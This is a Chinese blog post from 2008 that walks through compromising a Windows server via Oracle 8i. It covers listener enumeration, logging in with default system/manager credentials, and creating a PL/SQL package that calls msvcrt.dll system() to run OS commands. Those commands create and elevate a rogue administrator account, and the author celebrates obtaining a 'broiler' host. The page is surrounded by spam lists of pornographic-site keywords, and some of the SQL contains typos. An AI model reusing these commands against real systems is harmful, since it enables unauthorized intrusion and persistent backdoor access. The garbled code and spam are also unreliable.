国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

一次通過Oracle8i入侵系統之旅
2008-12-22   

最近看了些有關 Oracle 的安全資料,看后隨手做了一個滲透測試,把過程記錄下來方便日后查閱.。先用 SuperScan4.0 掃描下要測試的主機,速度很快,結果如圖 1 所示

圖1

端口 1521 是 Oracle 的 TNS Listener 默認監聽的端口,通過掃描報告還可以看到 Oracle 的版本為 8i.現在還不知道對方的操作系統版本,看到主機還開放了終端服務,直接連上去看下操作系統版本.如圖 2

 
圖2

確定操作系統版本為 Windows Server 2003 企業版。Oracle 10g 之前的版本默認情況下是允許遠程管理 TNS Listener 的,這臺主機的 Oracle 版本為 8i,我們通過 TNS Listenner 來收集下更多的詳細信息.如果本地安裝了 Oracle 可以直接調用 Lsnrctl 連接到測試的主機,如圖 3 所示:

 
圖3

通過輸入"status "命令我們可以得到 oracle 詳細版本(8.1.70.0),操作系統(Windows),跟蹤級別為 OFF(說明沒有開啟審核),安全性為 OFF(說明沒有設置 Listener 口令),日志文件的絕對路徑(判斷 Oracle 安裝路徑),數據庫的 SID(ccdr).

要遠程管理 Oracle, 需要知道 IP,數據庫的 SID,和連接的用戶名和密碼.IP 和 SID 我們已經知道了. 接下來用oscanner 工具掃描下要測試主機是否存在默認的密碼.如圖 4 所示

  
圖4

看來管理員安裝完 Oracle8i 后就沒有進行進一步的安全配置 , 所有的用戶名密碼都是默認的 . 在Oracle中,SYS/SYSTEM 都是具有 DBA 權限的帳戶,我這里選擇使用 SYSTEM/MA NAGER 來連接數據庫.

在本地用 Sqlplus 連接到目標 Oracle 數據庫,命令為:

SqlPlus  system/manager@//victimip:1521/ccdr

連接成功后,可以通過 PL/SQL 來運行 OS 命令,首先需要創建庫來定位 msvcrt.dll 文件.這里需要使用完整的路徑,通過剛才對主機的查點我們已經知道操作系統為 win2003, 如果系統安裝到C盤的話 , 那msvcrt.dll 默認路徑就為

c:\windows\system32\msvcrt.

創建庫的命令如下:

CREATE OR REPLACE LIBRARY exec_shell AS 'c:\windows\system32\msvcrt.dll';
接下來寫一個過程來調用 msvcrt.dll 里的 system()函數.命令如下:

CREATE OR REPLACE PACKAGE oracmd IS
0PROCEDURE exec (cmdstring IN CHAR);
/
CREATE ORE REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec (cmdstring IN CHAR)
IS EXTERNALI
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/

創建完后,就可以運行 OS 命令了.由于主機已經開放了終端服務,所以我這里添加個管理員,然后連接服務器.命 令如下:

exec oracmd.exec ('net user mickey imissyou /add');
exec oracmd.exec ('net localgroup administrators mickey /add');

帳戶創建完成后,如圖 5,就可以連接終端服務了,一臺肉雞到手了.:-)

 
圖5


熱詞搜索:

上一篇:對某貿易公司內網的一次安全檢測(1)
下一篇:我對某黑客技術網站的一次檢測(1)

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
亚洲电影欧美电影有声小说| 久久久国产精品亚洲一区| 国产亚洲成人一区| 亚洲资源av| 欧美呦呦网站| 亚洲国内精品在线| 欧美一区二区精美| 国产精品99免视看9| 亚洲精品国产精品国自产在线| 欧美中文字幕在线观看| 91久久综合| 蜜臀91精品一区二区三区| 宅男在线国产精品| 亚洲男女毛片无遮挡| 国产精品户外野外| 欧美日韩国产免费观看| 欧美成人免费全部观看天天性色| 久久天天躁狠狠躁夜夜爽蜜月| 欧美成人国产一区二区| 国产精品成人一区二区| 宅男噜噜噜66一区二区66| 亚洲欧美999| 一区二区三区导航| 欧美日本中文字幕| 国产精品嫩草99a| 国产一区视频观看| 亚洲激情网址| 欧美国产一区视频在线观看| 久久亚洲私人国产精品va| 欧美一区二区大片| 国产精一区二区三区| 亚洲一区3d动漫同人无遮挡| 国产伦精品一区二区三区四区免费 | 欧美大片国产精品| 亚洲人成网站在线观看播放| 欧美日韩国产成人高清视频| 一个色综合导航| 国产精品婷婷| 久久裸体艺术| 亚洲日本激情| 欧美精品成人一区二区在线观看| 欧美电影在线观看| 中文亚洲字幕| 国模精品娜娜一二三区| 影音先锋日韩有码| 欧美日韩大片| 久久激情视频久久| 欧美国产精品久久| 亚洲欧美怡红院| 在线视频成人| 国产精品你懂的| 久久人人爽人人| 亚洲视频在线视频| 樱桃国产成人精品视频| 免费不卡欧美自拍视频| 欧美亚洲视频在线观看| 亚洲黄页视频免费观看| 国产视频在线观看一区 | 在线播放日韩| 欧美日韩国产不卡在线看| 久久精品99久久香蕉国产色戒| 亚洲欧洲三级电影| 国产在线不卡| 国产精品网曝门| 精品成人一区| 国产精品美腿一区在线看| 男同欧美伦乱| 免费日韩视频| 久久综合一区| 欧美一区成人| 91久久国产综合久久蜜月精品| 国产欧美午夜| 亚洲精品视频在线播放| 国产精品永久免费| 欧美日韩中文字幕精品| 一区二区三区www| 亚洲黄色成人| 亚洲精品免费网站| 91久久国产综合久久91精品网站| 国产综合香蕉五月婷在线| 国产精品第一区| 欧美深夜福利| 狠狠干狠狠久久| 国产精品啊啊啊| 欧美特黄一级大片| 亚洲一区在线观看视频| 午夜精品av| 日韩午夜电影在线观看| 日韩一区二区久久| 午夜在线视频一区二区区别| 久久视频这里只有精品| 欧美日韩午夜在线| 免费人成网站在线观看欧美高清| 欧美电影打屁股sp| 国产精品久久久久国产精品日日| 国产亚洲精品一区二555| 国产精品国产三级国产| 国产一区二区三区在线播放免费观看| 在线观看日韩专区| 亚洲欧美成人一区二区三区| 蜜桃精品久久久久久久免费影院| 国产精品高潮久久| 91久久精品美女高潮| 欧美亚洲视频一区二区| 欧美精品粉嫩高潮一区二区 | 欧美久久一级| 国产亚洲人成网站在线观看| 国产精品国产三级国产aⅴ无密码 国产精品国产三级国产aⅴ入口 | 亚洲一区免费| 欧美大成色www永久网站婷| 老司机成人在线视频| 欧美日韩一区二区三区免费| 国产小视频国产精品| 亚洲图片激情小说| 欧美ed2k| 黄色日韩网站| 欧美在线三级| 久久久精品国产一区二区三区 | 国产精品女主播| 亚洲精品在线视频观看| 噜噜噜躁狠狠躁狠狠精品视频 | 亚洲精品一区二| 亚洲精品社区| 久久久久久91香蕉国产| 国产精品视频一二三| 夜夜爽99久久国产综合精品女不卡| 久久精品国产欧美激情| 国产精品视频精品视频| 中文久久精品| 欧美日韩在线三级| 国产精品99久久久久久www| 欧美激情一区二区三区在线视频 | 亚洲第一页在线| 久久aⅴ国产欧美74aaa| 国产精品美腿一区在线看| 亚洲午夜电影| 国产精品二区在线| 篠田优中文在线播放第一区| 国产日本亚洲高清| 在线精品在线| 玖玖在线精品| 欧美日韩免费高清| 亚洲视频在线视频| 国产精品视频成人| 欧美中文在线免费| 国内精品视频666| 久久这里只有| 亚洲国产精品一区二区三区| 亚洲黄色av一区| 免费成人高清视频| 亚洲春色另类小说| 欧美电影在线播放| 亚洲网址在线| 国产亚洲精品久| 欧美成人dvd在线视频| 一区二区三区免费网站| 国产美女诱惑一区二区| 久久天天躁夜夜躁狠狠躁2022 | 亚洲小说春色综合另类电影| 国产精品一区二区在线观看网站| 欧美一区二区免费观在线| 伊人久久亚洲美女图片| 欧美片在线播放| 亚洲专区一二三| 亚洲福利国产精品| 欧美视频一区| 久久免费国产精品| 一级成人国产| 狠狠干狠狠久久| 欧美三级电影网| 久久综合电影一区| 亚洲综合999| 激情欧美日韩一区| 欧美高清在线精品一区| 亚洲一区视频| 亚洲国产aⅴ天堂久久| 欧美色一级片| 欧美暴力喷水在线| 欧美在线视频观看免费网站| 亚洲黄色免费| 国产综合色产| 国产精品久久久久一区| 男人天堂欧美日韩| 久久国产精品99国产精| 亚洲精品美女在线观看| 国产欧美精品xxxx另类| 在线观看亚洲专区| 久久综合九色| 国产嫩草一区二区三区在线观看 | 久久亚洲综合色| 国产亚洲福利| 国产人久久人人人人爽| 欧美一级电影久久| 在线精品视频一区二区三四| 欧美精品在线免费观看| 午夜在线电影亚洲一区| 欧美精品成人一区二区在线观看| 国产一区二区三区久久| 在线日韩一区二区| 一区二区三区在线观看欧美 |